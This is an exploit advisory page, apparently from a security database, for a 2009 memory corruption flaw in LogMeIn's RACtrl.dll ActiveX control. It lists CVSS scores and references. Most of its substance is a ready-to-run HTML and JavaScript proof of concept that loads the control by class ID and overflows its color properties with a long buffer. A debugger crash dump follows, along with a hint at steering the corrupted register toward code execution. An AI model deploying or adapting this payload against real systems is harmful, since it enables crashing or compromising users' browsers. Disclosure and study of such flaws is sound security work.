LogMeIn Remote Access Utility ActiveX Memory Corruption

2009.08.27
Credit: Yag Kohha
Risk: High
Local: No
Remote: Yes
CWE: CWE-399


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<html> <body> <pre> LogMeIn Remote Access Utility ActiveX Memory Corruption 0day PoC (DoS) Software vendor URL: http://www.logmein.com Vulnerability at: RACtrl.dll (propset for: fgcolor, bgcolor, fmcolor) Author: Yag Kohha (skyhole [at] gmail.com) eax=024521b8 ebx=00000002 ecx=020e9f54 edx=00000011 esi=00000000 edi=00000000 eip=01fb537f esp=0013e160 ebp=0013e1e8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 RACtrl+0x3537f: 01fb537f 0fb706 movzx eax,word ptr [esi] ds:0023:00000000=???? ---->>> Wanna change [esi]? Try to play with colors ;D Greetz to: str0ke & milw0rm shinnai offtopic kais </pre> <object classid='clsid:FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9' id='obj1'></object> <script language='javascript'> var buf = ''; while (buf.length < 512) buf = buf + 'AAAA'; obj1.fgcolor = buf; obj1.bgcolor = obj1.fgcolor; </script> </body> </html>

References:

http://xforce.iss.net/xforce/xfdb/44843
http://www.securityfocus.com/bid/30923
http://packetstorm.foofus.com/0808-exploits/logmein-activex.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top